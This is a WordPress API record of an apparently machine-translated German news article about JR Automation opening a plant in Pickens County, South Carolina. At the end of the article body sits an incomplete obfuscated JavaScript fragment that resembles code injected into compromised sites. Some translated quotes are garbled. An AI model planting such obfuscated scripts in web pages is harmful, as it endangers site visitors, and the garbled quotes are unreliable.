{"id":9222,"date":"2020-10-28T16:34:31","date_gmt":"2020-10-28T16:34:31","guid":{"rendered":"http:\/\/alliancepickens.com\/2020\/10\/28\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\/"},"modified":"2021-07-21T20:13:52","modified_gmt":"2021-07-21T20:13:52","slug":"jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress","status":"publish","type":"post","link":"https:\/\/alliancepickens.com\/de\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\/","title":{"rendered":"Jr Automation soll signifikante Auswirkungen auf den Bereich der kleinunternehmen haben &#8211; Easley Progress"},"content":{"rendered":"<p>Von Jason Evans<br \/>\nPICKENS COUNTY \u2014 Lokale Beamte sagen, dass JR Automation Technologies, LLC nicht nur mindestens 54 neue Arbeitspl\u00e4tze in Pickens County bringen wird, sondern auch einen gro\u00dfen Einfluss auf die Unternehmen in der Region haben wird. Beamte des in Michigan ans\u00e4ssigen Automatisierten Spezialger\u00e4teunternehmens gaben am Dienstag bekannt, dass es nach Pickens County expandieren und eine Anlage in Pickens auf dem Gel\u00e4nde der ehemaligen Pace Plating Technology-Anlage am Walhalla Highway er\u00f6ffnen wird. &#8220;Zus\u00e4tzlich zu den Investitionen, die JR Automation t\u00e4tigt, und der Schaffung dieser neuen Arbeitspl\u00e4tze werden sie lokale Gesch\u00e4fte f\u00fcr etwa 30 Prozent ihrer Produktion nutzen&#8221;, sagte die Vorsitzende des County Council, Jennifer Willis. &#8220;Wir freuen uns sehr, sie hier zu haben. JR Automation ist ein Unternehmen, das das tut, was die Amerikaner am besten k\u00f6nnen \u2013 sie l\u00f6sen Probleme. &#8220;Sie haben sich wegen unserer Gesch\u00e4ftswelt f\u00fcr Pickens County entschieden, weil wir sie willkommen hei\u00dfen k\u00f6nnen, weil wir enorme Ressourcen haben, in unserer Belegschaft, in unseren Studenten, in unseren Schulen und in unseren Karrierezentren, mit Tri-County Tech und Clemson University&#8221;, fuhr sie fort. &#8220;Es sind 54 Arbeitspl\u00e4tze, direkte Arbeitspl\u00e4tze&#8221;, sagte Ray Farley, Executive Director von Alliance Pickens. &#8220;Aber unserer Meinung nach ist die gr\u00f6\u00dfere Geschichte hier vielleicht die Auswirkungen, die es auf unsere lokalen kleinen Unternehmen haben wird. JR hat das Pflaster buchst\u00e4blich auf der Anderenbasis vor Ort geh\u00e4mmert. Und ich kann Ihnen sagen, dass sie nicht sehr weit au\u00dferhalb der Grenzen unserer Stadt Pickens gegangen sind, um diese Lieferantenbasis zu bekommen, und daf\u00fcr sind wir sehr dankbar.&#8221; Der Vorsitzende von Alliance Pickens, Dr. Ronnie Booth, sagte, dass die Tatsache, dass das Unternehmen Pickens neue Arbeitspl\u00e4tze bringt, indem es expandiert \u2013 nicht eine bestehende Anlage stilllegt und umzieht \u2013 wunderbar ist.<br \/>\n&#8220;Es ist gut, neue Arbeitspl\u00e4tze in der Gemeinschaft zu schaffen&#8221;, sagte er. &#8220;Aber es ist besser zu wissen, dass sie sich nicht von einem anderen Ort bewegen. Es ist eine Erweiterung dessen, was JR tut. Es ist eine neue Chance \u2013 immer noch ihre Michigan-Einrichtungen zu behalten, aber n\u00e4her an einigen ihrer Kunden zu sein, ist eine gute Sache. Wir k\u00f6nnen alle gemeinsam feiern.&#8221; &#8220;Es ist gut zu sehen, wie ein neues Unternehmen kommt, aber es ist noch besser zu sehen, wie sie ein bestehendes Geb\u00e4ude nehmen und eine bestehende Anlage, die dort ist, gut nutzen, die einige Arbeit erforderte&#8221;, sagte Booth. &#8220;Das ist eine gute Sache f\u00fcr uns alle.&#8221; Zu sehen, wie Produkte vom Flie\u00dfband rollen, macht Spa\u00df, sagte Booth. &#8220;Aber noch besser ist es, die Gehirne hinter den Maschinen zu sehen&#8221;, sagte Booth. &#8220;Die Menschen, die die Dinge machen, die Dinge machen, die Menschen, die die Maschinen machen, die Dinge geschehen lassen. Darum geht es bei JR Automation.&#8221; Diese 54 Arbeitspl\u00e4tze, die das Unternehmen nach Pickens bringt, werden weitere Arbeitspl\u00e4tze in Unternehmen in der Region schaffen, sagte Booth. &#8220;Das ist der Multiplikatoreffekt, \u00fcber den wir oft sprechen&#8221;, sagte er. &#8220;Es ist sch\u00f6n, das auf sehr greifbare Weise zu sehen.&#8221; &#8220;Wir sind sehr, sehr aufgeregt, hier zu sein&#8221;, sagte Bryan Jones, Vice President von JR Automation Technologies. JR Automation-Kunden f\u00fchren den Bogen von Automobilherstellern \u00fcber Pharmaunternehmen bis hin zu Lebensmittelverarbeitenden Unternehmen, sagte Jones: &#8220;Jeder, der etwas herstellt oder verarbeitet, ist ein potenzieller Kunde f\u00fcr unsere Unternehmen&#8221;, sagte er. &#8220;Die Art von Sachen, die wir bauen, ist die Art von Ausr\u00fcstung, die man nicht einfach in einen Katalog gehen und kaufen kann. Sie k\u00f6nnen zu einem Katalog gehen und einen Drill kaufen; Sie k\u00f6nnen zu einem Katalog gehen und einen Laster kaufen. Aber sie zu einer automatischen Bohrmaschine zusammenzuf\u00fcgen, in die ich einfach das Teil einlege und es automatisch bohrt und die Qualit\u00e4tspr\u00fcfungen durchf\u00fchrt \u2013 das ist die Art von Ausr\u00fcstung, bei der wir viele Dinge integrieren.&#8221; Die Beteiligung an Lieferanten in der Region sei f\u00fcr das Unternehmen von entscheidender Bedeutung, sagte Jones. &#8220;Wir suchen Unternehmen, die Komponenten machen&#8221;, sagte er. &#8220;Dann kaufen wir diese Komponenten und stellen sie in einem System zusammen.&#8221; Er sagte, dass das Unternehmen immer versuchen wird, etwa 30 Prozent seiner Arbeit an lokale Unternehmen auszulagern. Das Unternehmen besch\u00e4ftigt derzeit fast 300 Mitarbeiter in seinen beiden Standorten in Michigan, sagte Jones. Das Unternehmen r\u00fcstet derzeit die ehemalige Pace Plating-Anlage nach, um ihren Bed\u00fcrfnissen gerecht zu werden. Jones sagte, das Unternehmen werde alle 20.000 Quadratmeter der Anlage nutzen und k\u00f6nnte m\u00f6glicherweise weiter expandieren. Er dankte allen lokalen Beamten und Unternehmen, die dem Unternehmen geholfen haben, seine Pickens-Anlage zu \u00f6ffnen, von Beamten mit Blue Ridge Electric und Duke Energy bis hin zu Inspektoren. &#8220;Es war ph\u00e4nomenal, mit den Menschen in diesem Bereich zusammenzuarbeiten, wie schnell sie in der Lage waren, auf unsere Bed\u00fcrfnisse zu reagieren, um all dies zu erreichen&#8221;, sagte Jones. Jones sagte, dass sein Unternehmen im vergangenen Jahr etwa 80 Millionen US-Dollar an automatisierten Spezialausr\u00fcstungen geleistet habe. &#8220;Unser Gesch\u00e4ft unterscheidet sich erheblich von der Fertigung \u2013 jeder Job, den wir machen, ist eine einmalige, speziell entwickelte L\u00f6sung f\u00fcr ein Problem&#8221;, sagte er. &#8220;Wir bauen die Fertigungsanlagen, die unsere Kunden dann in ihrem Gesch\u00e4ft zur Herstellung von Teilen verwenden. Es geht um viel Talent.&#8221; Er sagte, dass sich die Verantwortlichen des Unternehmens auf die Entwicklung dieser Talentbasis im Pickens County freuen. &#8220;Wir freuen uns sehr \u00fcber die Ausbildung, die bereits in Ihrem Landkreis stattfindet&#8221;, sagte Jones. &#8220;Es ist wichtig f\u00fcr Amerika; es steht au\u00dfer Frage. Die Bildungsbasis, die Sie entwickeln, wird einen Unterschied machen.<br \/>\n&#8220;Die Tech-Schulen, das College, die verschiedenen Dinge, die aus dieser Perspektive vor sich gehen, es ist einfach riesig f\u00fcr unser Gesch\u00e4ft, so etwas vor Ort zu haben&#8221;, sagte er. Farley sagte, dass interessierte Unternehmensvertreter der Erfolg lokaler Robotik- und Mechatronik-Programme waren, deren Studenten auf nationaler und internationaler Ebene konkurrieren. &#8220;Unsere Robotik-Studenten haben die NC Regional Championship gewonnen&#8221;, sagte Farley. &#8220;Sie nahmen das Beste an, was das Forschungsdreieck auf unsere Kinder werfen musste \u2013 und unsere Kinder schlugen sie. Das ist germane zu unserer heutigen Ank\u00fcndigung. Das ist zum Teil der Grund, warum wir heute feiern. Es ist ein gutes Zeugnis f\u00fcr unsere Gemeinschaft.&#8221; Jones stimmte zu. &#8220;Die technischen Programme in den Schulen zu haben, ist gro\u00dfartig&#8221;, sagte er. &#8220;Eines der Dinge, die wir wirklich hoffen, um die Gemeinschaft zu bringen, ist, eine andere Seite der Bildung zu zeigen \u2013 die Dinge, die man tun kann, die Dinge, die man mit dieser Ausbildung lernen kann und einige der M\u00f6glichkeiten, die da drau\u00dfen sind.&#8221; Das Unternehmen stelle derzeit f\u00fcr den neuen Pickens-Standort ein, sagte Jones. &#8220;Wir suchen Maschinenbauingenieure, Steuerungsingenieure, jede Art von Engineering sowie Baupositionen \u2013 Maschinenbau, Maschineninstallation, Maschinenverdrahtung&#8221;, sagte Jones. Die Bezahlung basiert auf dem Talentset. &#8220;Es gibt eine gro\u00dfe Gehaltsskala&#8221;, sagte Jones. &#8220;Mehr unserer Arbeitspl\u00e4tze werden auf der technischen Seite stehen.&#8221; &#8220;Unsere lokale Industrie hat die technische Sorgfalt, um sehr hohe technische Fertigung zu machen&#8221;, sagte Farley. Mandy Brawley, Projektmanagerin des Handelsministeriums von South Carolina, sagte, es sei &#8220;wirklich eine Teamleistung&#8221;, das Unternehmen nach Pickens zu bringen. Sie dankte den Verantwortlichen des Unternehmens daf\u00fcr, dass sie &#8220;die Vorteile einer Gesch\u00e4ftst\u00e4tigkeit in South Carolina gesehen und erkannt haben&#8221;. &#8220;Wir erkennen an, dass dieses Projekt \u00fcberall h\u00e4tte gehen k\u00f6nnen, und wir danken Ihnen daf\u00fcr, dass Sie es nach Pickens und south Carolina gebracht haben&#8221;, sagte Brawley.<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Von Jason Evans PICKENS COUNTY \u2014 Lokale Beamte sagen, dass JR Automation Technologies, LLC nicht nur mindestens 54 neue Arbeitspl\u00e4tze in Pickens County bringen wird, sondern auch einen gro\u00dfen Einfluss auf die Unternehmen in der Region haben wird. Beamte des in Michigan ans\u00e4ssigen Automatisierten Spezialger\u00e4teunternehmens gaben am Dienstag bekannt, dass es nach Pickens County expandieren&hellip;<\/p>\n","protected":false},"author":8,"featured_media":5102,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[57],"tags":[],"class_list":["post-9222","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news-de","category-57","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Jr Automation soll signifikante Auswirkungen auf den Bereich der kleinunternehmen haben - Easley Progress - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/de\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Jr Automation soll signifikante Auswirkungen auf den Bereich der kleinunternehmen haben - Easley Progress - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"Von Jason Evans PICKENS COUNTY \u2014 Lokale Beamte sagen, dass JR Automation Technologies, LLC nicht nur mindestens 54 neue Arbeitspl\u00e4tze in Pickens County bringen wird, sondern auch einen gro\u00dfen Einfluss auf die Unternehmen in der Region haben wird. Beamte des in Michigan ans\u00e4ssigen Automatisierten Spezialger\u00e4teunternehmens gaben am Dienstag bekannt, dass es nach Pickens County expandieren&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/de\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:published_time\" content=\"2020-10-28T16:34:31+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-07-21T20:13:52+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"990\" \/>\n\t<meta property=\"og:image:height\" content=\"618\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"AP Transfer\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"AP Transfer\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\\\/\"},\"author\":{\"name\":\"AP Transfer\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\"},\"headline\":\"Jr Automation soll signifikante Auswirkungen auf den Bereich der kleinunternehmen haben &#8211; Easley Progress\",\"datePublished\":\"2020-10-28T16:34:31+00:00\",\"dateModified\":\"2021-07-21T20:13:52+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\\\/\"},\"wordCount\":1283,\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"articleSection\":[\"News\"],\"inLanguage\":\"de-DE\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\\\/\",\"name\":\"Jr Automation soll signifikante Auswirkungen auf den Bereich der kleinunternehmen haben - Easley Progress - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"datePublished\":\"2020-10-28T16:34:31+00:00\",\"dateModified\":\"2021-07-21T20:13:52+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/de\\\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de-DE\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\\\/#primaryimage\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"contentUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"width\":990,\"height\":618,\"caption\":\"Alliance Pickens Logo\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Jr Automation soll signifikante Auswirkungen auf den Bereich der kleinunternehmen haben &#8211; Easley Progress\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\",\"name\":\"AP Transfer\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de-DE\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"caption\":\"AP Transfer\"},\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/author\\\/aptransfer\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Jr Automation soll signifikante Auswirkungen auf den Bereich der kleinunternehmen haben - Easley Progress - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/de\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\/","og_locale":"de_DE","og_type":"article","og_title":"Jr Automation soll signifikante Auswirkungen auf den Bereich der kleinunternehmen haben - Easley Progress - Alliance Pickens","og_description":"Von Jason Evans PICKENS COUNTY \u2014 Lokale Beamte sagen, dass JR Automation Technologies, LLC nicht nur mindestens 54 neue Arbeitspl\u00e4tze in Pickens County bringen wird, sondern auch einen gro\u00dfen Einfluss auf die Unternehmen in der Region haben wird. Beamte des in Michigan ans\u00e4ssigen Automatisierten Spezialger\u00e4teunternehmens gaben am Dienstag bekannt, dass es nach Pickens County expandieren&hellip;","og_url":"https:\/\/alliancepickens.com\/de\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\/","og_site_name":"Alliance Pickens","article_published_time":"2020-10-28T16:34:31+00:00","article_modified_time":"2021-07-21T20:13:52+00:00","og_image":[{"width":990,"height":618,"url":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","type":"image\/jpeg"}],"author":"AP Transfer","twitter_card":"summary_large_image","twitter_misc":{"Written by":"AP Transfer","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/alliancepickens.com\/de\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\/#article","isPartOf":{"@id":"https:\/\/alliancepickens.com\/de\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\/"},"author":{"name":"AP Transfer","@id":"https:\/\/alliancepickens.com\/de\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01"},"headline":"Jr Automation soll signifikante Auswirkungen auf den Bereich der kleinunternehmen haben &#8211; Easley Progress","datePublished":"2020-10-28T16:34:31+00:00","dateModified":"2021-07-21T20:13:52+00:00","mainEntityOfPage":{"@id":"https:\/\/alliancepickens.com\/de\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\/"},"wordCount":1283,"image":{"@id":"https:\/\/alliancepickens.com\/de\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\/#primaryimage"},"thumbnailUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","articleSection":["News"],"inLanguage":"de-DE"},{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/de\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\/","url":"https:\/\/alliancepickens.com\/de\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\/","name":"Jr Automation soll signifikante Auswirkungen auf den Bereich der kleinunternehmen haben - Easley Progress - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/de\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/de\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/de\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\/#primaryimage"},"thumbnailUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","datePublished":"2020-10-28T16:34:31+00:00","dateModified":"2021-07-21T20:13:52+00:00","author":{"@id":"https:\/\/alliancepickens.com\/de\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01"},"breadcrumb":{"@id":"https:\/\/alliancepickens.com\/de\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/de\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\/"]}]},{"@type":"ImageObject","inLanguage":"de-DE","@id":"https:\/\/alliancepickens.com\/de\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\/#primaryimage","url":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","contentUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","width":990,"height":618,"caption":"Alliance Pickens Logo"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/de\/jr-automation-soll-signifikante-auswirkungen-auf-den-bereich-der-kleinunternehmen-haben-easley-progress\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/de\/"},{"@type":"ListItem","position":2,"name":"Jr Automation soll signifikante Auswirkungen auf den Bereich der kleinunternehmen haben &#8211; Easley Progress"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/de\/#website","url":"https:\/\/alliancepickens.com\/de\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"},{"@type":"Person","@id":"https:\/\/alliancepickens.com\/de\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01","name":"AP Transfer","image":{"@type":"ImageObject","inLanguage":"de-DE","@id":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","caption":"AP Transfer"},"url":"https:\/\/alliancepickens.com\/de\/author\/aptransfer\/"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/posts\/9222","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/comments?post=9222"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/posts\/9222\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/media\/5102"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/media?parent=9222"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/categories?post=9222"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/tags?post=9222"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}